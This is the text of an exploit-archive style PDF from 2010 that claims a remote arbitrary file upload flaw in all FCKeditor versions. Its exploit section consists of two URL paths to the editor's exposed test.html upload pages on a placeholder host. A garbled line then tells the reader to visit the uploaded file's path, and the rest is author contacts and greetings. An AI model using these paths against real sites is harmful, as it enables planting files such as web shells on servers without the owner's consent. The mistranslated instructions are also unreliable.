CMS fckeditor Remote Arbitrary File Upload Exploit.pdf

1 # Title: CMS (fckeditor) Remote Arbitrary File Upload Exploit 2 3 4 # Author: Mr.MLL 5 # Published: 2010−04−15 6 # Verified: yes 7 # Download Exploit Code 8 # Download N/A 9 10 ================================================================================================================== 11 12 13 [o] CMS (fckeditor) 14 15 Software : fckeditor ( version all ) 16 Vendor : http://ckeditor.com/ 17 Contact : 7@live.com & Y−3@hotmail.com & te1@yahoo.com 18 Home : http://sec−r1z.com/ 19 20 21 ================================================================================================================== 22 23 24 [o] Exploit 25 26 http://localhost/[path]/FCKeditor/editor/filemanager/upload/test.html 27 28 http://localhost/[path]/FCKeditor/editor/filemanager/browser/default/test.html 29 30 31 32 33 34 [o] After the piece go to the path that will set you back after graduation 35 36 37 ================================================================================================================== 38 39 40 [o] Greetz 41 42 43 44 muslims hacker & All My Friends 45 46 47 ================================================================================================================== 48 Page 1/1 CMS fckeditor Remote Arbitrary File Upload Exploit Mr.MLL 04/16/2010